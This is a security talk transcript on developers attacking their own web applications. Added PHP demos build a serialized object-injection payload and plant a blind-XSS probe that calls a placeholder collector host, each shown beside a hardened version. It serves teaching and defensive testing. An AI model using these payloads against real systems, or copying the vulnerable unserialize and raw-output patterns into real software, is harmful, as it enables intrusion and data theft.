Thinking Like an Attacker
Nick Le Mouton
February 05, 2018
Technology
Transcript
Thinking Like an Attacker (Hacking Your Own Organisation)
# whoami • Nick Le Mouton (@noodlesnz) • CTO Drugs.com
• Developer • Security • Operations
Googlebot
A2:2017 Broken Authentication
• Disconnect between security and developers
• Security finds vulnerabilities
• Developers fix vulnerabilities
• Security often doesn't impart how they found the vulnerabilities in the first place
• Developers are in the best position to attack an application: they already have the logic and the knowledge
• Shift mindset
Object Injection Example • A8:2017 Insecure Deserialization
GuzzleHttp\Cookie\CookieJar
Payload
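The slide shows only the gadget class name and the word "Payload". As an added example (not code from the deck or from Guzzle), the script below demonstrates the same class of bug with a hypothetical application class, `CacheFile`, standing in for the real gadget: a user-controlled cookie reaches `unserialize()`, PHP instantiates whatever class the attacker names, and that class's `__destruct()` runs with attacker-chosen properties. The hardened loader refuses to instantiate any class at all. The class name, cookie name and file path are all assumptions; PHP 8.0 or later is assumed.

```php
<?php
declare(strict_types=1);

// Added example, not from the deck. CacheFile is a hypothetical application
// class standing in for the real gadget (GuzzleHttp\Cookie\CookieJar). The
// point is that ANY loaded class with a useful __destruct()/__wakeup() is
// reachable once attacker data hits unserialize(). Requires PHP >= 8.0.

final class CacheFile
{
    public string $path = '/tmp/cache.txt';
    public string $data = '';

    // Runs when the object is destroyed, whether or not the application
    // ever called a method on it. That is what makes it a gadget.
    public function __destruct()
    {
        file_put_contents($this->path, $this->data);
    }
}

// VULNERABLE: a cookie the client controls goes straight into unserialize(),
// which happily instantiates CacheFile with attacker-chosen properties.
function loadPrefsVulnerable(string $cookie): mixed
{
    return unserialize(base64_decode($cookie));
}

// HARDENED: allowed_classes => false means no object is ever created; any
// serialized object becomes __PHP_Incomplete_Class, whose magic methods never
// run. An explicit whitelist of plain DTO classes is the next-best option;
// a data-only format such as JSON for anything the client can edit is better.
function loadPrefsHardened(string $cookie): array
{
    $raw = base64_decode($cookie, true);
    if ($raw === false) {
        return [];
    }
    $prefs = @unserialize($raw, ['allowed_classes' => false, 'max_depth' => 8]);
    return is_array($prefs) ? $prefs : [];
}

// Attacker side: the payload is built as a string, so the attacker never
// needs the class loaded locally; the victim's unserialize() instantiates it.
function buildPayload(string $class, string $path, string $data): string
{
    $serialized = sprintf(
        'O:%d:"%s":2:{s:4:"path";s:%d:"%s";s:4:"data";s:%d:"%s";}',
        strlen($class), $class,
        strlen($path), $path,
        strlen($data), $data
    );
    return base64_encode($serialized);
}

// Demo against a temp file so it is safe to run locally.
$target = sys_get_temp_dir() . '/object-injection-demo.txt';
@unlink($target);
$cookie = buildPayload(CacheFile::class, $target, "written by attacker\n");

$obj = loadPrefsVulnerable($cookie);   // CacheFile carrying the attacker's properties
unset($obj);                           // __destruct() fires: attacker's data lands at attacker's path
printf("vulnerable: file %s\n", file_exists($target) ? 'written' : 'not written');
@unlink($target);

$prefs = loadPrefsHardened($cookie);   // incomplete class discarded, nothing executes
printf("hardened:   %s, file %s\n",
    $prefs === [] ? 'payload rejected' : 'unexpected result',
    file_exists($target) ? 'written' : 'not written');
```

The practitioner's check is the one the demo performs: feed a serialized object of a class the application never expects and see whether anything observable happens when it is destroyed. In a real codebase the gadget need not be your own class; any dependency loaded by the autoloader (as with the Guzzle cookie jar on the slide) is fair game, which is why `allowed_classes => false` or a non-object format is the fix rather than "we don't have any dangerous classes".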
Blind XSS • A7:2017 Cross-Site Scripting (XSS) • Security scan shows no XSS vulnerability, because the payload executes somewhere the scanner never looks (an internal admin page, a log viewer, a support tool)
XSS Hunter • hosted payloads that call home with page details when they fire, so you learn about the blind sink
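To make the "scan says no XSS" point concrete, here is an added example (not from the deck or from XSS Hunter) of a blind XSS sink: a feedback handler that stores the request's User-Agent and message but reflects nothing on the public site, and an internal admin view that renders the stored values raw. The collector hostname, field names and the in-memory "database" are constructed for the example; XSS Hunter operates on the same call-home principle.

```php
<?php
declare(strict_types=1);

// Added example, not from the deck. Simulates a feedback form whose stored
// fields are never echoed on the public site (so a scanner reports "no XSS")
// but are rendered raw in an internal admin view. The collector hostname is
// hypothetical; XSS Hunter works on the same call-home principle.

// Public handler: stores the submission and reflects nothing. A scanner
// fuzzing this endpoint gets the same response whatever it sends.
function handleFeedback(array &$db, string $userAgent, string $message): string
{
    $db[] = ['ua' => $userAgent, 'message' => $message];
    return 'Thanks for your feedback.';
}

// VULNERABLE admin view: raw interpolation of stored, attacker-controlled data.
function renderAdminVulnerable(array $db): string
{
    $html = "<table>\n";
    foreach ($db as $row) {
        $html .= "<tr><td>{$row['ua']}</td><td>{$row['message']}</td></tr>\n";
    }
    return $html . "</table>\n";
}

// Output encoding for an HTML text context. ENT_QUOTES also covers attribute
// contexts; ENT_SUBSTITUTE stops invalid UTF-8 from silently emptying output.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// HARDENED admin view: every value encoded at the point of output. In a real
// app, also send a Content-Security-Policy so a sink you missed cannot load
// a remote script.
function renderAdminHardened(array $db): string
{
    $html = "<table>\n";
    foreach ($db as $row) {
        $html .= '<tr><td>' . e($row['ua']) . '</td><td>' . e($row['message']) . "</td></tr>\n";
    }
    return $html . "</table>\n";
}

// Crude check used only by this demo: did the probe survive as live markup?
function containsLiveScript(string $html): bool
{
    return stripos($html, '<script') !== false;
}

// Constructed traffic: one normal visitor, then an attacker who puts a
// blind-XSS probe in the User-Agent header, a field nobody looks at until
// an admin opens the log viewer.
$db = [];
handleFeedback($db, 'Mozilla/5.0 (X11; Linux x86_64)', 'Great site!');
$probe = '"><script src="https://xss-collector.example/probe.js"></script>';
handleFeedback($db, $probe, 'hello');

printf("public response: %s\n", handleFeedback($db, $probe, 'probe again'));
printf("vulnerable admin view executes probe: %s\n",
    containsLiveScript(renderAdminVulnerable($db)) ? 'yes' : 'no');
printf("hardened admin view executes probe:   %s\n",
    containsLiveScript(renderAdminHardened($db)) ? 'yes' : 'no');
```

The lesson for testing your own organisation: inject a call-home payload into every field that gets stored (headers included, not just form inputs), then wait. A scanner that only compares request and response cannot see this sink; a payload that phones the collector when an admin opens the page can.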
So How Can I Do That?
• Offensive Security courses
• Hack Yourself First by Troy Hunt (pluralsight.com)
• https://infosec101.nz/
• Start hacking things, find out what works and what doesn't
• Damn Vulnerable Web Application (DVWA)
• OWASP Juice Shop Project
CTFs
• CTFLearn.com
• Find upcoming online CTFs on ctftime.org
• Read write-ups at ctftime.org/writeups
Thank You